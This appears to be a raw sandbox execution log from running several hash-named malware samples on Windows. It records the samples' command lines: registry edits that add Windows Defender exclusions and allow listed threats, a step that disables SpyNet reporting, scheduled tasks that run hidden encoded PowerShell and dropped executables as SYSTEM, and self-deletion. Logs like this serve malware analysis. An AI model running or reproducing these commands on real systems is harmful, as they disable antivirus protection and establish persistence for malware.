"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5772 /prefetch:8
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\2023-11-22-22\" -spe -an -ai#7zMap17809:88:7zEvent26173
C:\Users\Admin\Downloads\2023-11-22-22\1324fa6536148b20c0452f0d0d3930c77ca32d2abef6bae3f2019931d4a9517c.exe
"C:\Users\Admin\Downloads\2023-11-22-22\1324fa6536148b20c0452f0d0d3930c77ca32d2abef6bae3f2019931d4a9517c.exe"
C:\Users\Admin\AppData\Local\Temp\cpqflwztt.exe
"C:\Users\Admin\AppData\Local\Temp\cpqflwztt.exe"
C:\Users\Admin\AppData\Local\Temp\cpqflwztt.exe
"C:\Users\Admin\AppData\Local\Temp\cpqflwztt.exe"
C:\Users\Admin\Downloads\2023-11-22-22\7ee5c994ac006822269f3fe52d67cee97f5f80850451691a0bb721dc70169bae.exe
"C:\Users\Admin\Downloads\2023-11-22-22\7ee5c994ac006822269f3fe52d67cee97f5f80850451691a0bb721dc70169bae.exe"
C:\Users\Admin\Downloads\2023-11-22-22\ef74c4c21db18cfae6ef7ec3761c074d433f81945835613f0772c87c077cb137.exe
"C:\Users\Admin\Downloads\2023-11-22-22\ef74c4c21db18cfae6ef7ec3761c074d433f81945835613f0772c87c077cb137.exe"
C:\Users\Admin\Downloads\2023-11-22-22\facc892bab57ba7b10fa2c6170577f45137ab714b4a0622187344e86dde0dac9.exe
"C:\Users\Admin\Downloads\2023-11-22-22\facc892bab57ba7b10fa2c6170577f45137ab714b4a0622187344e86dde0dac9.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 5216 -ip 5216
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5216 -s 784
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5512 -ip 5512
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5512 -s 348
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Downloads\2023-11-22-22\7ee5c994ac006822269f3fe52d67cee97f5f80850451691a0bb721dc70169bae.exe" & del "C:\ProgramData\*.dll"" & exit
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 636 -ip 636
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 636 -s 2252
C:\Windows\SysWOW64\timeout.exe
timeout /t 5
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1920 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4796 /prefetch:8
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\2023-11-23-10\" -spe -an -ai#7zMap12309:88:7zEvent5162
C:\Users\Admin\Downloads\2023-11-23-10\fa1268f5d18e814cd471bea9d91c971489a04f810a974d8c9136ba3062923679.exe
"C:\Users\Admin\Downloads\2023-11-23-10\fa1268f5d18e814cd471bea9d91c971489a04f810a974d8c9136ba3062923679.exe"
C:\Users\Admin\Downloads\2023-11-23-10\bf20e10da6c6c4a65f9e992ea5dc4618d09dda0b3fe9de72fbe6e62dc791b307.exe
"C:\Users\Admin\Downloads\2023-11-23-10\bf20e10da6c6c4a65f9e992ea5dc4618d09dda0b3fe9de72fbe6e62dc791b307.exe"
C:\Users\Admin\AppData\Local\Temp\7zS5A07.tmp\Install.exe
.\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS5B40.tmp\Install.exe
.\Install.exe /taAdidMRmzJ "525403" /S
C:\Users\Admin\Downloads\2023-11-23-10\3cbd732d1d9b72c12fd0b5338f6ea6417ec2d242f258fedab71fe48cdadccc2a.exe
"C:\Users\Admin\Downloads\2023-11-23-10\3cbd732d1d9b72c12fd0b5338f6ea6417ec2d242f258fedab71fe48cdadccc2a.exe"
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gJOEVIibN" /SC once /ST 09:16:36 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gJOEVIibN"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
C:\Users\Admin\Downloads\2023-11-23-10\fa1268f5d18e814cd471bea9d91c971489a04f810a974d8c9136ba3062923679.exe
"C:\Users\Admin\Downloads\2023-11-23-10\fa1268f5d18e814cd471bea9d91c971489a04f810a974d8c9136ba3062923679.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gJOEVIibN"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bPIVdqgtNzoofgavuM" /SC once /ST 15:09:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\RBTDPuBvwCAQssKTg\CGDsaSCQdoaAdsY\VGjcNCy.exe\" r3 /pRsite_idUnG 525403 /S" /V1 /F
C:\Users\Admin\AppData\Local\Temp\RBTDPuBvwCAQssKTg\CGDsaSCQdoaAdsY\VGjcNCy.exe
C:\Users\Admin\AppData\Local\Temp\RBTDPuBvwCAQssKTg\CGDsaSCQdoaAdsY\VGjcNCy.exe r3 /pRsite_idUnG 525403 /S
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IWiqTrOkU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IWiqTrOkU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LbkorXnFckOLpaAHvRR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LbkorXnFckOLpaAHvRR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fZMfFgxjsFJU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fZMfFgxjsFJU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nMsbjdmXnsxFC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nMsbjdmXnsxFC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\vRXrVmfWTIUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\vRXrVmfWTIUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\bqYuHbIITFqKPmVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\bqYuHbIITFqKPmVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\RBTDPuBvwCAQssKTg\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\RBTDPuBvwCAQssKTg\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\qkTATVOZOEOSiyaz\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\qkTATVOZOEOSiyaz\" /t REG_DWORD /d 0 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IWiqTrOkU" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IWiqTrOkU" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IWiqTrOkU" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LbkorXnFckOLpaAHvRR" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LbkorXnFckOLpaAHvRR" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fZMfFgxjsFJU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fZMfFgxjsFJU2" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nMsbjdmXnsxFC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nMsbjdmXnsxFC" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vRXrVmfWTIUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vRXrVmfWTIUn" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\bqYuHbIITFqKPmVB /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\bqYuHbIITFqKPmVB /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
